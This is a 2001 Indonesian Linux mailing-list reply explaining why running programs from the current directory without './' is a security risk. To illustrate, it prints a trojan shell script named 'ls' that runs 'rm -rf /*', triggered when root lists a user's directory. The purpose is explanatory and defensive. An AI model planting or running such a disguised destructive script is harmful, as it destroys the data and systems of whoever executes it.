On Friday 23 November 2001 11:57 am, you wrote:
> Utk menjalankan suatu aplikasi di Linux dari direktori tempat kita
> berada, biasanya kita harus mengetik ./ tlbh dahulu di depan nama
> aplikasi program yg akan dijalankan. Hal ini terkadang sgt menggangu dan
> saya telah berhasil meng-eliminate-nya shg tidak perlu menulis ./ lagi
> tp cukup nama prog.nya saja.
>
> Apakah hal ini membuka celah keamanan tertentu ???
Pasti ada... saya pernah baca dari k-elektronik
Kalo salah seorang user anda membuat sebuah shell script seperti ini,
#!/bin/sh
# Nama file "ls"
# File ini mod-nya 777
rm -rf /*
echo YOU ARE DEAD !!!
lantas sewaktu anda menjadi root dan melakukan list file di home user
tersebut....
[root@HOST useriseng]# ls -al
YOU ARE DEAD !!!
Booommm....
Install ulang.. :(. Itu sebabnya semua command hanya boleh meng-execute yang
dalam path saja. Kecuali ditentukan secara jelas path dan file yang mau di
execute.
Mohon koreksinya.
>
>
> Thx
Kembail :)
--
Ferdinand Neman
--
COMPASS [for the CDC-6000 series] is the sort of assembler one expects from
a corporation whose president codes in octal.
-- J.N. Gray
--
Utk berhenti langganan, kirim email ke [EMAIL PROTECTED]
Informasi arsip di http://www.linux.or.id/milis.php3
